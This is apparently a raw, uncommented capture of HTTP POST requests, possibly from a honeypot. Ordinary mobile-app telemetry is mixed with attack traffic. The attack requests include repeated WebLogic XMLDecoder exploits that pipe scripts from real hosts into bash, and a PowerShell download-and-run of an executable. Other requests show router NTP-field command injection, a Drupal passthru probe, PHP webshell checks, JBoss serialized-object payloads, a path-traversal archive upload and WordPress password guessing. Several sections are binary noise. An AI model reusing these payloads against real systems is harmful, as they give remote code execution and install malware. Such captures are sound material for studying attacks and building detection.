User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
®}fi›Ã≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·∞î(π+Y›∆√«∆fl

POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
™≈˜[Ã≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·∞î´5Y›∆√«∆fl

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
pÈ!3Ã≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îHY›∆√«∆fl

POST http://hydra.alibaba.com/utdid_uc_browser/get_aid/?auth[token]=c8bc6fdf9837b2cbc7a9ed011ca1327b&type=utdid&id=V3JxZrJFQuwDAMtgV%2FWSY7o6&aid= HTTP/1.1
Content-Length: 0
Host: hydra.alibaba.com
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)



POST /w.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 32

leng=die((string)(111111111*9));

POST /xx.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 31

axa=die((string)(111111111*9));

POST http://behacdn.ksmobile.net/ecfl HTTP/1.1
Accept-Encoding: gzip
Charset: UTF-8
Content-Type: multipart/form-data; boundary=----------------------------7d92221b604bc
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: behacdn.ksmobile.net
Connection: Keep-Alive
Content-Length: 49

1Ñö	«
ÍÕ`i'c
KlE^Sz]#[@^zZr^kZ&=0OoBcékµ]IJ

POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1
Host: x.x.x.x:8080
User-Agent: python-requests/2.19.1
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Length: 159
Content-Type: application/x-www-form-urlencoded

form_id=user_register_form&_drupal_ajax=1&mail%5Ba%5D%5B%23post_render%5D%5B%5D=passthru&mail%5Ba%5D%5B%23type%5D=markup&mail%5Ba%5D%5B%23markup%5D=echo+ponies

POST /UD/act?1 HTTP/1.1
Host: x.x.x.x:7547
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
Content-Type: text/xml
Content-Length: 526

<?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body>  <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1">   <NewNTPServer1>`cd /tmp;wget http://l.ocalhost.host/2;chmod 777 2;./2`</NewNTPServer1>   <NewNTPServer2></NewNTPServer2>   <NewNTPServer3></NewNTPServer3>   <NewNTPServer4></NewNTPServer4>   <NewNTPServer5></NewNTPServer5>  </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope>


POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 36
Cache-Control: no-cache

log=jamesatchue&pwd=jamesatchue44444

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST /s.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 48

leng=die('Hello, Peppa!'.(string)(111111111*9));

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0
Connection: Close
Content-Type: text/xml
Content-Length: 1195



POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 28
Cache-Control: no-cache

log=admin&pwd=admin123456789

POST http://profile.adkmob.com/ud/ HTTP/1.1
Content-Length: 230
Content-Type: text/plain; charset=ISO-8859-1
Host: profile.adkmob.com
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; MI 4LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36

v=16&ac=50&pos=34100&mid=104&lan=in_ID&ext=&cmver=51424845&mcc=510&mnc=10&pl=2&channelid=2010002546&lp=0&gaid=8776479c-11a4-48e7-8a70-96e640a29187&aid=6ccc52a8048214f&attach=[{"res":0,"pkg":"com.screensaver.ad","des":"","sug":-1}]

POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 23
Cache-Control: no-cache

log=admin&pwd=888888888

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST http://f3.mi-stat.gslb.mi-idc.com/diagnoses/v1/report HTTP/1.1
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: f3.mi-stat.gslb.mi-idc.com
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Type: application/x-www-form-urlencoded
Content-Length: 437

n=134255745806775&d=HCgAGAAYABgAABgHaHR0cGFwaRwYB2h0dHBhcGkYATAYFjQuNC40LVY3LjAuNS4wLktYRE1JQ0kYDG1vYmlsZS1IU1BBKxgOMTE0LjEyNC4yMTAuOTgcGAAYABgAGAAAGhwYE2FwcC5jaGF0LnhpYW9taS5uZXQZLBgTYXBwLmNoYXQueGlhb21pLm5ldBUAFQIWlLECFQAbAAAYEjExMS4yMDYuMjAwLjI6NTIyMhUCFQAWABUAGwGFFlNvY2tldFRpbWVvdXRFeGNlcHRpb24CAAAYD2NvbS54aWFvbWkueG1zZhgPY29tLnhpYW9taS54bXNmGBY0LjQuNC1WNy4wLjUuMC5LWERNSUNJAAA%3D&t=1494586103072&s=E6F1A827C8D2E358D8E3EF6A22788153

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; InfoPath.3; .NET4.0E)
Host: x.x.x.x
Content-Length: 456
Cache-Control: no-cache

RKZeydqeZ91Pf94kJtD5EhVPQlC9D7X6hgpJLrps3yWaRPR58jRuZ/kIxDGYI3/Wj5tJSmMzV/yfEl47V40E4mNM362qMoL7UPYEFdLMTcDQMaplt9GToXo5Bx60niHiRiV2RZNWESO25wv4t3qSIsUAJ6m142C0+Patn3a1KvQzdKFvFUKC0WjlBz4w7aFoF7idJiJP0IOCaet6MjCIyx40txp16l7zCqx5Q5qO11HISwNLPdKxL5l71pwdl68xo7mVrddYXi7cqqYpV9r2VBwvJ+qfsJCjOK5E4r0feb9ibwF2tUYC1Ym88wTeqdmCf3GQFBVIGCI2DLs4jHS8IeFoor/cI/FFWlE0nXIQGPEVFxhGGkp3HkFK8hx/OMOZMs2bdfb6xk7CjdrfiO6bzS6R+LgZGmtTxhadJEBKLXQv5YkMstEcIn10auXFDC2oH5B+Kw==

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Content-Type: text/xml
Accept: text/html, application/xhtml+xml, */*
Accept-Encoding: gbk, GB2312
Accept-Language: zh-cn
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Upgrade-Insecure-Requests: 1
Content-Length: 847
Host: x.x.x.x:7001

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
     <soapenv:Header>
     <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
     <java version="1.8.0_131" class="java.beans.XMLDecoder">
     <void class="java.lang.ProcessBuilder">
     <array class="java.lang.String" length="3">
     <void index="0">
     <string>cmd</string>
     </void>
     <void index="1">
     <string>/c</string>
     </void>
     <void index="2">
     <string>powershell (new-object System.Net.WebClient).DownloadFile('http://down.idc3389.top/downloader.exe','C:/Windows/temp/searsvc.exe');start C:/Windows/temp/searsvc.exe</string>
     </void>
     </array>
     <void method="start"/></void>
     </java>
     </work:WorkContext>
     </soapenv:Header>
     <soapenv:Body/>
    </soapenv:Envelope>

POST http://cmdts.ksmobile.com/c/ HTTP/1.1
Content-Length: 132
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: cmdts.ksmobile.com
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Type: application/x-www-form-urlencoded

Ñ
£†
Ì	MÆ˛

¡Ã◊·Êr4ŒwæÎÎÎΩ∫È∞∏º∞∫πºÓCÂY–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏CÂY€¯‰È˚‡·Êԅθ·˛·¸Ò

POST http://p-behacdn.ksmobile.net/cu HTTP/1.1
Accept-Encoding: gzip
Charset: UTF-8
Content-Type: multipart/form-data; boundary=----------------------------7d92221b604bc
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: p-behacdn.ksmobile.net
Connection: Keep-Alive
Content-Length: 576

@˚À€
ÍÕ`i+nC\KlE^Sz]#[@^zZr^kZ&=0OoBcékV∏iRËc^ <∞êΩúqj–˙+%kZ&=:OcøúèïCh*8k'2<0OeBoÀdEhB*:kZ&I)NoAipf3F*9k[&=0–oBcs`Bd‹™=k[&=0OoBcpjAbC&ìZ&<0OoBcpjBh@ 8g3¸50NoCcpj]b+;aZ*πÍGoCcrjBhe8kY,=<…µJcqjChC*≤ñ&>:Ocƒ"wjChB*8kπ‰90LeBo˜+EhB*8kZ&=0OoAipf )D*9kZ&=0OoBcs`Bd…k?k[&=0OoBcpjAbC&2Ó^&<0MoBcojBh@ 8g•Ü:0NoBcpjBhC*;aZ*üØGoCcpjBhC*8kY,=<∂EcqjBhC*8kZ&>:Ocø¸wjChC*8kZ&=0LeBoéıEhB*8kZ&=0OoAipf@»D*9kZ&=0OoBcs`Bd…	8k[&:0OoI™pjAbC&ˇ¢Z&<0OoBcpjBh@ 8gr=0NoAcpj11á(;aZ*iOoCc2jBh0á7kY,=<P'DcqjChC*'kZ&>:OcE6pjChC*8kZ&=0LeBoj	JhB*:kZ&ù$OoAipf≥G*9kZ&=0OoBcs`BdΩ’«î[&Ø¢'P_cpjBbC

POST /your/killing/me/smalls.jpg HTTP/1.1
Host: x.x.x.x
Connection: Keep-Alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Content-Length: 9
Accept-Language: en-us
x-requested-with: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded



POST http://hoodrunner.kiloo.com/hr_dailyquests2.php HTTP/1.1
X-Unity-Version: 4.6.5f1
Content-Type: application/x-www-form-urlencoded
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: hoodrunner.kiloo.com
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 13

key=OZFH566OZ

POST /xw.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 45

h=die('Hello, Peppa!'.(string)(111111111*9));

POST /invoker/JMXInvokerServlet HTTP/1.1
Host: x.x.x.x:8080
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
ContentType:: application/x-java-serialized-object; class=org.jboss.invocation.MarshalledInvocation
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 687

¨Ìsr)org.jboss.invocation.MarshalledInvocationˆï'A>§æxppwóQM›‘*BØsrjava.lang.Integer‚†§˜Åá8
Ivaluexrjava.lang.Numberܨïî‡ãxp&ïæ
sr$org.jboss.invocation.MarshalledValueÍÇ—ÙJ–ôxpwâŨÌur[Ljava.lang.Object;êŒXüs)lxpsrjavax.management.ObjectNameßÎmœxptjboss.system:type=ServerInfoxtOSName{á†˚xw
sr"org.jboss.invocation.InvocationKey∏˚rÑ◊ìÖ˘
Iordinalxpsr$org.jboss.invocation.MarshalledValueÍÇ—ÙJ–ôxpw
¨Ìp˚Wß™xwsr"org.jboss.invocation.InvocationKey∏˚rÑ◊ìÖ˘
Iordinalxpsr#org.jboss.invocation.InvocationTypeYß:•+|ø
Iordinalxp
sr"org.jboss.invocation.InvocationKey∏˚rÑ◊ìÖ˘
Iordinalxp
px

POST http://cfg.cml.ksmobile.com/post HTTP/1.1
Accept-Encoding: gzip
Content-Length: 1019
Content-Type: multipart/form-data; boundary=wWRarNSbwU4HV4EVH3AKFUeSOTawGw
Host: cfg.cml.ksmobile.com
Connection: Keep-Alive

--wWRarNSbwU4HV4EVH3AKFUeSOTawGw
Content-Disposition: form-data; name="protocver"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

1
--wWRarNSbwU4HV4EVH3AKFUeSOTawGw
Content-Disposition: form-data; name="ran"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

381935
--wWRarNSbwU4HV4EVH3AKFUeSOTawGw
Content-Disposition: form-data; name="sig"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

2882ac56c9a0b04fd2d2baaae7e79c59
--wWRarNSbwU4HV4EVH3AKFUeSOTawGw
Content-Disposition: form-data; name="flag"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

0
--wWRarNSbwU4HV4EVH3AKFUeSOTawGw
Content-Disposition: form-data; name="data"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

{"module":"searchengine","mcc":"510","sdkver":"1.14","appname":"iswipe","did":"6ccc52a8048214f","modulever":"39","language":"in_ID","channel":"2010002546"}
--wWRarNSbwU4HV4EVH3AKFUeSOTawGw--


POST http://cfg.cml.ksmobile.com/post HTTP/1.1
Accept-Encoding: gzip
Content-Length: 1063
Content-Type: multipart/form-data; boundary=BDO0al7Ai886DANyvi2IqRHCt_lsVB7upNfFU
Host: cfg.cml.ksmobile.com
Connection: Keep-Alive

--BDO0al7Ai886DANyvi2IqRHCt_lsVB7upNfFU
Content-Disposition: form-data; name="protocver"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

1
--BDO0al7Ai886DANyvi2IqRHCt_lsVB7upNfFU
Content-Disposition: form-data; name="ran"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

438644
--BDO0al7Ai886DANyvi2IqRHCt_lsVB7upNfFU
Content-Disposition: form-data; name="sig"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

e8835890b4626af1827f1ce7a7181afb
--BDO0al7Ai886DANyvi2IqRHCt_lsVB7upNfFU
Content-Disposition: form-data; name="flag"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

0
--BDO0al7Ai886DANyvi2IqRHCt_lsVB7upNfFU
Content-Disposition: form-data; name="data"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

{"module":"sdk_preferences","mcc":"510","sdkver":"1.14","appname":"iswipe","did":"6ccc52a8048214f","modulever":"5","language":"in_ID","channel":"2010002546"}
--BDO0al7Ai886DANyvi2IqRHCt_lsVB7upNfFU--


POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 396
Cache-Control: no-cache

QKxWwY/AMeI5XEOrqwqysgVMewA6N/3rzcQLa3yXdd3uxPQtOfHZkGQYoxGW8FmUUfT3ecSkJaloiA/vsdyqy540VtIBhEQ1vNyaBXVS97aj1xA/vZQ+0upqVJj5pr8736e+NykMYgGUlWvgPaK/d4RMt3pHBXXeoAqZdIttx1YP7amcnky2DgQg/y7RjM+Wep+ZSW0dekp74l6ucKGV7Td6t329nnyz89D3ik+T8hjzWwbymCt19pjb5oUmUDPaKExpEsw4EQX10zNqveQ42HRWleHnnvawrVbT7sJuwLV1uQBXQkjj1ONbA35W7/oG6NPHlDqFeC5UKYjoKLvbfgIAAmnGZMfttTr21z9OsIlDFyywEmgkO7XzgC/ZaxIesSK8As0PTQ==

POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
®}fi›Ã≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·∞î(π+Y›∆√«∆fl

POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 22
Cache-Control: no-cache

log=admin&pwd=17171717

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Cache-Control: no-cache
Connection: close
Content-Type: text/xml
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gbk, GB2312
Accept-Language: zh-cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:57.0) Gecko/20100101 Firefox/57.0
Upgrade-Insecure-Requests: 1
Content-Length: 1133
Host: x.x.x.x:7001

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> 
    <soapenv:Header>
        <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> 
            <java version="1.6.0" class="java.beans.XMLDecoder">
                <object class="java.lang.ProcessBuilder"> 
                    <array class="java.lang.String" length="4">
                       <void index="0">
                        <string>/bin/bash</string>
                    </void>
                     <void index="1">
                        <string>-c</string>
                    </void>    
                     <void index="2">
                        <string>wget -O - -q http://3389.space/lx/logo.jpg|bash</string>
                    </void>
                     <void index="3">
                        <string>curl  http://3389.space/lx/logo.jpg|bash</string>
                    </void>
                    </array>
                <void method="start"/> 
                </object>
            </java> 
        </work:WorkContext>
    </soapenv:Header>
    <soapenv:Body/> 
</soapenv:Envelope>

POST http://cfg.cml.ksmobile.com/post HTTP/1.1
Accept-Encoding: gzip
Content-Length: 1039
Content-Type: multipart/form-data; boundary=-D-bGJadyY0HYB1j0NTfvZmt0CwT01fl8
Host: cfg.cml.ksmobile.com
Connection: Keep-Alive

---D-bGJadyY0HYB1j0NTfvZmt0CwT01fl8
Content-Disposition: form-data; name="protocver"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

1
---D-bGJadyY0HYB1j0NTfvZmt0CwT01fl8
Content-Disposition: form-data; name="ran"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

154831
---D-bGJadyY0HYB1j0NTfvZmt0CwT01fl8
Content-Disposition: form-data; name="sig"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

df4ddeed67dbc6a04c1cac21c3aaa598
---D-bGJadyY0HYB1j0NTfvZmt0CwT01fl8
Content-Disposition: form-data; name="flag"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

0
---D-bGJadyY0HYB1j0NTfvZmt0CwT01fl8
Content-Disposition: form-data; name="data"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

{"module":"sdk_preferences","mcc":"510","sdkver":"1.14","appname":"iswipe","did":"6ccc52a8048214f","modulever":"5","language":"in_ID","channel":"2010002546"}
---D-bGJadyY0HYB1j0NTfvZmt0CwT01fl8--


POST http://batsavcdn.ksmobile.net/bsi HTTP/1.1
Connection: close
User-Agent: CMTalkerSDK.0.0.1
Content-Type: multipart/form-data; boundary=3i2ndDfv2rTHiSisAbouNdArYfORhtTPEefj3q2f
Accept-Language: in_ID
Host: batsavcdn.ksmobile.net
Accept-Encoding: gzip
Transfer-Encoding: chunked

22c
,≠ÄòÄ
w€|`9dAVp
Mo)M\WRexTP$fnax]Huíbu(
aJLZgj-: wR"5=dWHmS?\WMZ+jO][Fu9Fj
V9!
2'KW$A

* D$"A@$JLZgzAZPFu:
aS\XJl}EXUZaqiPBCrWU`-LPiR
Tn,AXRnyLQ2QU>xENOH'khWH>Xe,
fPWXHi*PSn{WrYJCrB@Aus|CB+
M>;O[<
8<
ue
GrUBCrD]VXn{`P^W@i~L[UFu*
rASWP@lz_S_`}6@YT;.G
Tf|5JLZgj[TZa}S6^WUI<}FTX5/MaTZJ;}WOu&
aJLZg}C_RYo|rTL[Z>'B4,J]?OH8jYNHmiDCBly@^ZXf|fPVUOipM@A	us
gW
Kk}L
_1zV2A[Wh)LRYgxI|L[Z;}LT[dQi[M<)DZVYa*cGXJ5(


POST /s.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 48

leng=die('Hello, Peppa!'.(string)(111111111*9));

POST /sheep.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 44

m=die('Hello, Peppa!'.(string)(111111111*9))

POST http://check.proxyradar.com/azenv.php?auth=149552563701&a=PSCMN&i=1082784101&p=80 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close

testPost=true



POST /wls-wsat/CoordinatorPortType HTTP/1.1
Connection: Keep-Alive
Content-Type: text/xml; Charset=UTF-8
Accept: */*
Accept-Language: zh-cn
Referer: http://x.x.x.x:7001/wls-wsat/CoordinatorPortType
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
Content-Length: 742
Host: x.x.x.x:7001

<?xml version="1.0" encoding="utf-8"?>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
    <soapenv:Header>
        <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
            <java>
                <void class="java.lang.Thread" method="currentThread">
                    <void method="getCurrentWork">
                        <void method="getResponse">
                            <void method="getWriter"><void method="write"><string>xmldecoder_vul_test</string></void></void>
                        </void>
                    </void>
                </void>
            </java>
        </work:WorkContext>
    </soapenv:Header>
    <soapenv:Body/>
</soapenv:Envelope>

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST /c5Zh.up?uniqueId=06982&module=../../server/default/deploy&qqfile=7DzVUYUXUL4PC5mXyl0QfYC5c3c.ear HTTP/1.1
Host: x.x.x.x:8080
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
